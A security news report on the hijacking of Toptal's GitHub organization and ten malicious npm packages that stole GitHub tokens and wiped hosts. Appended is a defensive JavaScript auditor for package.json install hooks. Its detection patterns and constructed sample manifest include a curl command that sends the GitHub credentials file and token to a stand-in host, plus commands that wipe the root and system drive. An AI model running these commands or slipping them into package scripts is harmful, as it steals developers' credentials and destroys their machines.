Hackers compromised Toptal's GitHub organization account and used that access to publish ten malicious packages on the Node Package Manager (NPM) registry.

Toptal is a freelance talent marketplace that connects companies with software developers, designers, and finance experts. The company also maintains internal developer tools and design systems, most notably Picasso, which it distributes through GitHub and NPM.

The attackers hijacked Toptal's GitHub organization on July 20 and almost immediately made all 73 of its repositories public, exposing private projects and source code.

In the days that followed, they modified the source code of Picasso on GitHub to include malware and published the ten malicious packages on NPM under Toptal's name, so that they appeared to be legitimate updates.

The malicious code was injected into the packages' 'package.json' files as two lifecycle scripts that npm runs automatically on installation: a 'preinstall' script that collected GitHub authentication tokens and exfiltrated them, and a 'postinstall' script that wiped the victim's host. The malicious packages were downloaded roughly 5,000 times before being detected, so a substantial number of developer machines were likely affected.

Although the initial compromise method remains unknown, code security platform Socket lists multiple possibilities ranging from insider threats to phishing attacks targeting Toptal developers.

According to Socket, Toptal deprecated the malicious packages on July 23 and reverted to safe versions, but issued no public statement alerting users who had downloaded the malicious releases to the risk.

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
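The attack relied on a feature practitioners often forget: npm runs a dependency's install-time lifecycle scripts with no prompt. The following is an added example, not code from BleepingComputer, Socket or Toptal, and it does not reproduce the actual payload. It audits a package.json for install hooks and flags commands that look like credential collection or host destruction. The function names (auditPackageJson, verdict), the heuristic patterns, and the two sample manifests are all constructed for this example.

```javascript
// Added example (not from BleepingComputer, Socket or Toptal): audit the
// lifecycle scripts in a package.json before installing it. npm runs a
// dependency's preinstall/install/postinstall/prepare scripts automatically
// during `npm install`, which is the hook the malicious Toptal packages used.
'use strict';

// Lifecycle scripts npm executes without any further prompt on install.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics for commands that have no business in an install hook. These are
// generic patterns chosen for this example (assumptions), NOT the real payload.
const SUSPICIOUS = [
  { reason: 'remote script piped into a shell',
    re: /\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b/ },
  { reason: 'recursive delete of / or the home directory',
    re: /\brm\b[^;&|]*\s-[a-zA-Z]*r[a-zA-Z]*\b[^;&|]*\s(\/|~|\$HOME)(?=\s|$)/ },
  { reason: 'touches GitHub CLI credentials',
    re: /\.config\/gh\/hosts\.yml|\bgh auth token\b/ },
  { reason: 'references a GitHub token variable',
    re: /\b(GITHUB_TOKEN|GH_TOKEN)\b/ },
  { reason: 'network access from an install hook',
    re: /\b(curl|wget)\b|https?:\/\// },
];

// Parse a package.json string and return every install-time hook it declares,
// each with the heuristic reasons (possibly none) that make it look hostile.
function auditPackageJson(text) {
  const pkg = JSON.parse(text);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== 'string') continue;
    const command = scripts[hook];
    const reasons = SUSPICIOUS.filter((s) => s.re.test(command)).map((s) => s.reason);
    findings.push({ hook, command, reasons });
  }
  return { name: pkg.name, version: pkg.version, findings };
}

// Collapse an audit into a verdict: 'block' if any hook matched a heuristic,
// 'review' if it declares install hooks that look benign, 'clean' if it has none.
function verdict(audit) {
  if (audit.findings.some((f) => f.reasons.length > 0)) return 'block';
  return audit.findings.length > 0 ? 'review' : 'clean';
}

// Constructed sample manifests for the demo (not real Toptal/Picasso files).
const BENIGN_SAMPLE = JSON.stringify({
  name: '@example/design-tokens', version: '1.2.3',
  scripts: { postinstall: 'node scripts/build-tokens.js', test: 'jest' },
});
const HOSTILE_SAMPLE = JSON.stringify({
  name: '@example/design-tokens', version: '1.2.4',
  scripts: {
    preinstall: 'curl -s -X POST https://example.invalid/c -d @$HOME/.config/gh/hosts.yml -d "$GITHUB_TOKEN"',
    postinstall: 'rm -rf --no-preserve-root / 2>/dev/null; rd /s /q %SystemDrive%\\ 2>nul',
  },
});

// Stand-alone usage: `node audit-lifecycle.js [path/to/package.json]`;
// without a path the two constructed samples are audited.
const argPath = typeof process !== 'undefined' && process.argv[2];
const inputs = argPath && typeof require === 'function'
  ? [require('fs').readFileSync(argPath, 'utf8')]
  : [BENIGN_SAMPLE, HOSTILE_SAMPLE];
for (const text of inputs) {
  const audit = auditPackageJson(text);
  console.log(`${audit.name}@${audit.version}: ${verdict(audit)}`);
  for (const f of audit.findings) {
    console.log(`  ${f.hook}: ${f.command}`);
    for (const r of f.reasons) console.log(`    - ${r}`);
  }
}
```

Run this against the tarball's package.json (for example after `npm pack <name>@<version>`) before the package ever hits `npm install`. A heuristic like this catches only the obvious cases; the stronger control is to install with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) and run trusted build steps explicitly, and to pin exact versions so a hijacked account cannot push a "legitimate update" into your lockfile. Note that in this incident the Picasso source itself was also modified, so auditing lifecycle scripts alone would not have flagged everything.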
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 24 Jul 2025 13:30:15 +0000